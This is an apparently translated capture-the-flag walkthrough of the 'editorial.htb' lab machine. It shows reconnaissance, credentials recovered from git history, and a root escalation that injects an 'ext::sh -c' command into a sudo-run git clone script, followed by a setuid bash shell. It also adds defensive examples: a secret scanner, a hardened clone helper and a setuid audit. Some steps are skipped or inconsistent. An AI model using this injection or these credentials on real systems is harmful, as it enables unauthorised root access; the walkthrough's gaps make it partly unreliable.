First we ping the machine to see whether it responds
ping -c 1 10.10.11.20
PING 10.10.11.20 (10.10.11.20) 56(84) bytes of data.
64 bytes from 10.10.11.20: icmp_seq=1 ttl=63 time=158 ms
--- 10.10.11.20 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 157.795/157.795/157.795/0.000 ms
We launch the first nmap command to discover listening ports
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:20 CET
Initiating SYN Stealth Scan at 20:20
Scanning 10.10.11.20 [65535 ports]
Discovered open port 22/tcp on 10.10.11.20
Discovered open port 80/tcp on 10.10.11.20
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.31% done; ETC: 20:20 (0:00:16 remaining)
cat allPorts
# Nmap 7.93 scan initiated Mon Oct 28 20:20:18 2024 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allPorts 10.10.11.20
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.11.20 () Status: Up
Host: 10.10.11.20 () Ports: 22/open/tcp//ssh///, 80/open/tcp//http/// Ignored State: closed (65533)
# Nmap done at Mon Oct 28 20:20:38 2024 -- 1 IP address (1 host up) scanned in 19.42 seconds
We only have ports 80 and 22; we launch the second nmap command to find the service versions.
nmap -sCV -p22,80 10.10.11.20 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:21 CET
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_ 256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
cat targeted
# Nmap 7.93 scan initiated Mon Oct 28 20:21:58 2024 as: nmap -sCV -p22,80 -oN targeted 10.10.11.20
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_ 256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OK, the first thing we'll do is check with whatweb whether there is any vulnerability
whatweb 10.10.11.20
http://10.10.11.20 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.20], RedirectLocation[http://editorial.htb], Title[301 Moved Permanently], nginx[1.18.0]
ERROR Opening: http://editorial.htb - no address for editorial.htb
Indeed we see it reports "no address"; trying to access it from the browser we see nothing. We try to enumerate some scripts
nmap --script http-enum -p80 10.10.11.20 -oN webScan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:24 CET
Nmap scan report for 10.10.11.20
Host is up (0.17s latency).
PORT STATE SERVICE
80/tcp open http
It tells us port 80 is open, so we set up a listener by starting a Python server
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
We look for SUID permissions
find / -perm -4000 -user root 2>/dev/null
/opt/vivaldi/vivaldi-sandbox
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/ntfs-3g
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/libexec/polkit-agent-helper-1
/usr/sbin/exim4
/usr/sbin/pppd
/usr/share/codium/chrome-sandbox
I see lots of paths, but nothing I can take advantage of to escalate privileges.
I try connecting over ssh; I see I can, but I don't have the passwords.
ssh editorial@10.10.11.20
The authenticity of host '10.10.11.20 (10.10.11.20)' can't be established.
ECDSA key fingerprint is SHA256:vD0RRLKSdq+ahh96RLgD4c6th30+PC391OHKI6SWlhY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.20' (ECDSA) to the list of known hosts.
editorial@10.10.11.20's password:
Connection closed by 10.10.11.20 port 22
I go back to the web and try fuzzing to see existing paths. I find an interesting directory, go in, and have found the password of user dev
ssh dev@10.10.11.20
dev@10.10.11.20's password:
Permission denied, please try again.
dev@10.10.11.20's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Mon Oct 28 08:26:33 PM UTC 2024
System load: 0.0 Processes: 245
Usage of /: 61.9% of 6.35GB Users logged in: 2
Memory usage: 14% IPv4 address for eth0: 10.10.11.20
Swap usage: 0%
I see the user flag
cat user.txt
I try going to the root directory, but I don't have permission to enter that directory. I look for SUID permissions with find
dev@editorial:/$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/tmp/0xdf
I see the passwd directory, I try to go in but I don't have permission and I see the following error
dev@editorial:/usr/bin$ cat passwd
[binary data] _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable __cxa_finalize __libc_start_main stderr dcgettext __fprintf_chk fputs fputc exit stdout getspnam gmtime strftime __printf_chk __stack_chk_fail free strcmp __errno_location setlocale strdup __syslog_chk
With the getcap command I look for more capabilities
dev@editorial:/usr/bin$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
Well, OK, I don't see how to take advantage of that right now. I keep looking with an ls and see another directory
dev@editorial:~$ ls
apps user.txt
dev@editorial:~$ cd apps/
From an internet search I see that from the apps directory I have to use git to get into the different environments
dev@editorial:~/apps$ git log --oneline
8ad0f31 (HEAD -> master) fix: bugfix in api port endpoint
dfef9f2 change: remove debug and update api port
b73481b change(api): downgrading prod to dev
1e84a03 feat: create api to editorial info
3251ec9 feat: create editorial app
I try them one by one because I don't know what will be in each of them
dev@editorial:~/apps$ git log -p 3251ec9
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:48:43 2023 -0500
feat: create editorial app
* This contains the base of this project.
* Also we add a feature to enable to external authors send us their
books and validate a future post in our editorial.
diff --git a/app_editorial/app.py b/app_editorial/app.py
new file mode 100644
I don't see anything there, I'll try another
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date: Sun Apr 30 20:55:08 2023 -0500
change(api): downgrading prod to dev
* To use development environment.
diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
@app.route(api_route + '/authors/message', methods=['GET'])
def api_mail_new_authors():
return jsonify({
- 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+ 'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
}) # TODO: replace dev credentials when checks pass
# -------------------------------
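Review bot: the `-`/`+` pair inside `api_mail_new_authors()` swaps one hardcoded password for another inside a string literal that an unauthenticated GET endpoint returns, so the secret is still in source, still served by the API, and the removed `prod` password remains recoverable from this commit in history. Suggest loading the credential from an environment variable or a secrets store (e.g. `os.environ["ONBOARDING_PASSWORD"]`), returning the template without the password, and rotating both the `prod` and `dev` passwords; the `# TODO: replace dev credentials when checks pass` comment on the following line confirms the dev value was never meant to ship.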
Now I can see the system usernames and their corresponding passwords.
I become user prod
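The credential above only surfaced because the whole history of the repository was readable with `git log -p`. The following added scanner (my own example, not the author's or the machine's code) walks a unified diff and flags added or removed lines carrying password-like strings, which is the check a code reviewer or a pre-push hook would run; the `SAMPLE_DIFF` is constructed for the example and the `scan_repo_history` helper assumes a local `git` binary on the path.

```python
import re
import subprocess
from typing import List, Tuple

# Patterns a reviewer would flag in source or commit history: explicit
# "Password: ..." strings inside templates, and assignments to secret-like names.
SECRET_PATTERNS = [
    re.compile(r"Password\s*:\s*(\S+)", re.IGNORECASE),
    re.compile(r"""(?i)\b(password|passwd|secret|api_key|token)\s*[=:]\s*['"]([^'"]+)['"]"""),
]


def scan_diff_text(diff_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, line) for every added or removed line that matches.

    Both '+' and '-' lines are reported: a secret that was removed is still
    recoverable from history, so it needs rotating just like one that was added.
    """
    hits = []
    for n, line in enumerate(diff_text.splitlines(), 1):
        # skip context lines and the ---/+++ file headers of each diff
        if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
            continue
        if any(p.search(line) for p in SECRET_PATTERNS):
            hits.append((n, line))
    return hits


def scan_repo_history(repo_path: str) -> List[Tuple[int, str]]:
    """Run `git log -p --all` over a local repository and scan every hunk."""
    out = subprocess.run(
        ["git", "-C", repo_path, "log", "-p", "--all"],
        capture_output=True, text=True, check=True,
    ).stdout
    return scan_diff_text(out)


# Constructed sample diff (not from any real repository) in the shape of a
# commit that swaps one hardcoded credential for another in a mail template.
SAMPLE_DIFF = """\
diff --git a/app.py b/app.py
--- a/app.py
+++ b/app.py
@@ -1,3 +1,3 @@
 def template():
-    return "Username: svc\\nPassword: OldSecret123!\\n"
+    return "Username: svc\\nPassword: NewSecret456!\\n"
"""

if __name__ == "__main__":
    for n, line in scan_diff_text(SAMPLE_DIFF):
        print(f"line {n}: {line}")
```

Run against a checkout with `scan_repo_history("/path/to/repo")`; every hit is a credential to rotate, regardless of whether a later commit "removed" it.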
dev@editorial:~/apps$ su prod
Password:
I check what permissions I have
prod@editorial:~$ sudo -l
[sudo] password for prod:
Matching Defaults entries for prod on editorial:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User prod may run the following commands on editorial:
(root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *
I see that message tells me I have root execution permission on the indicated script.
I cat it and read the contents
prod@editorial:~$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3
import os
import sys
from git import Repo
os.chdir('/opt/internal_apps/clone_changes')
url_to_clone = sys.argv[1]
r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
I run it
prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext:: sh -c touch% /tmp/pwned'
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext:: sh -c touch% /tmp/pwned new_changes
stderr: 'Cloning into 'new_changes'...
error: cannot run : No such file or directory
fatal: Can't run specified command
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
It seems to give an error, but I list the directory I'm in again and see a new file pwned
prod@editorial:/tmp$ ls -l
total 156
-rwsrwsrwx 1 root root 125688 Oct 28 19:13 0xdf
-rw-r--r-- 1 root root 0 Oct 28 21:00 pwned
-rw-r--r-- 1 root root 33 Oct 28 16:32 root
-rw-rw-r-- 1 prod prod 42 Oct 28 15:06 shell.sh
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-ModemManager.service-UhnVKh
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-logind.service-3ntdas
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-resolved.service-ET5KMa
drwx------ 3 root root 4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-timesyncd.service-WEXcRM
drwx------ 3 root root 4096 Oct 28 16:28 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-upower.service-hICjtH
drwx------ 2 root root 4096 Oct 28 10:02 vmware-root_795-4257200573
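The root cause here is that `clone_prod_change.py` passes `sys.argv[1]` straight to `git clone` while forcing `-c protocol.ext.allow=always`, so the `ext::` transport (which runs a local command) is reachable from a sudo rule with a `*` wildcard. Below is a hardened variant of the helper, written here as an added example rather than the machine's or any project's code: it allow-lists the URL scheme and host, refuses whitespace and helper prefixes, and drops the `protocol.ext.allow` override so git's default policy applies. The host name `git.example.internal` and the install path are assumed values; GitPython is imported lazily so the validation can be exercised without it.

```python
#!/usr/bin/python3
"""Hardened clone helper (added example; assumes it runs as root via sudo with
exactly one argument, a repository URL)."""
import os
import sys
from urllib.parse import urlsplit

# Only network transports that cannot start a local program are accepted.
# ext:: and fd:: are excluded, as are bare local paths and file:// URLs, which
# would let the caller point root at arbitrary files.
ALLOWED_SCHEMES = {"https", "ssh", "git"}
# Assumed deploy host; a helper that runs as root should not clone from anywhere.
ALLOWED_HOSTS = {"git.example.internal"}


def validate_clone_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return the URL unchanged if it is safe to clone; raise ValueError otherwise."""
    # whitespace or a '::' helper prefix means a transport command, not a URL
    if any(c.isspace() for c in url) or "::" in url:
        raise ValueError("URL contains whitespace or a remote-helper prefix")
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    if not parts.hostname or parts.hostname not in allowed_hosts:
        raise ValueError(f"host {parts.hostname!r} not allowed")
    if parts.password:
        raise ValueError("embedded passwords are not allowed")
    return url


def clone(url: str, dest: str = "new_changes") -> None:
    """Validate first, then clone without relaxing git's protocol policy."""
    from git import Repo  # GitPython, imported lazily (assumed installed on the host)
    safe_url = validate_clone_url(url)
    os.chdir("/opt/internal_apps/clone_changes")  # assumed working directory
    r = Repo.init("", bare=True)
    # No multi_options=["-c protocol.ext.allow=always"]: ext:: stays disabled.
    r.clone_from(safe_url, dest)


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: clone_prod_change.py <repository-url>")
    try:
        clone(sys.argv[1])
    except ValueError as err:
        sys.exit(f"refused: {err}")
```

Note that scp-style `git@host:path` remotes have no scheme and are rejected by design; express them as `ssh://git@host/path` instead. The sudoers entry should also be tightened, since `*` lets the caller supply any argument.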
I write myself a bash script and give myself console execution permissions
prod@editorial:/tmp$ nano privesc
I give it execute permission
prod@editorial:/tmp$ chmod 775 privesc
I run it again
prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c /tmp/privesc.sh'
Traceback (most recent call last):
File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
finalize_process(proc, stderr=stderr)
File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
proc.wait(**kwargs)
File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c /tmp/privesc.sh new_changes
stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
I list the current directory
prod@editorial:/tmp$ sudo ./privesc.sh
Sorry, user prod is not allowed to execute './privesc.sh' as root on editorial.
prod@editorial:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 2024 /bin/bash
prod@editorial:/tmp$ bash -p
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt
I'm root now.
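The final step works because `/bin/bash` had been made setuid root and `bash -p` keeps the effective uid. Both `find -perm -4000` listings on this page show how a baseline comparison would have caught that (a shell, plus an unknown setuid file in `/tmp`). The following added audit script is my own example, not code from the machine: `classify` compares each setuid-root file against an assumed stock-Ubuntu allow-list and flags shells, interpreters, world-writable files and files in world-writable directories; `scan_filesystem` runs it on a live host, and `SAMPLE` is constructed stat data in the shape of this page's findings.

```python
import os
import stat
from typing import Dict, Iterable, List, Tuple

# Assumed allow-list of setuid-root binaries on a stock Ubuntu 22.04 install;
# build the real one from a golden image rather than from a compromised host.
BASELINE = {
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/fusermount3", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/sudo", "/usr/bin/umount",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/openssh/ssh-keysign",
    "/usr/libexec/polkit-agent-helper-1",
}
# Setuid on a shell or interpreter is a root shell for anyone who can run it.
SHELL_NAMES = {"bash", "sh", "dash", "zsh", "python3", "perl", "find", "vim"}
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def classify(path: str, mode: int, uid: int) -> List[str]:
    """Return the reasons a setuid-root file is suspicious (empty = expected)."""
    reasons: List[str] = []
    if uid != 0 or not (mode & stat.S_ISUID):
        return reasons  # not setuid-root, nothing to judge
    if path not in BASELINE:
        reasons.append("not in baseline")
    if os.path.basename(path) in SHELL_NAMES:
        reasons.append("setuid shell/interpreter")
    if path.startswith(WORLD_WRITABLE_DIRS):
        reasons.append("lives in a world-writable directory")
    if mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons


def audit(entries: Iterable[Tuple[str, int, int]]) -> Dict[str, List[str]]:
    """entries: (path, st_mode, st_uid). Returns only the suspicious files."""
    return {p: r for p, m, u in entries if (r := classify(p, m, u))}


def scan_filesystem(root: str = "/") -> Dict[str, List[str]]:
    """Walk the live system without following symlinks and audit regular files."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys")]
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                found.append((p, st.st_mode, st.st_uid))
    return audit(found)


# Constructed sample stat data (mode, uid) mirroring this page's findings.
SAMPLE = [
    ("/usr/bin/passwd", 0o104755, 0),   # -rwsr-xr-x, expected
    ("/usr/bin/sudo", 0o104755, 0),     # expected
    ("/bin/bash", 0o104755, 0),         # -rwsr-xr-x: setuid shell
    ("/tmp/0xdf", 0o106777, 0),         # -rwsrwsrwx in /tmp
    ("/usr/bin/ping", 0o100755, 0),     # no setuid bit (uses a capability instead)
]

if __name__ == "__main__":
    for path, reasons in audit(SAMPLE).items():
        print(path, "->", ", ".join(reasons))
```

Run `scan_filesystem()` from a cron job or a configuration-management check and alert on any non-empty result; diffing its output against the previous run also catches the moment a binary gains the setuid bit.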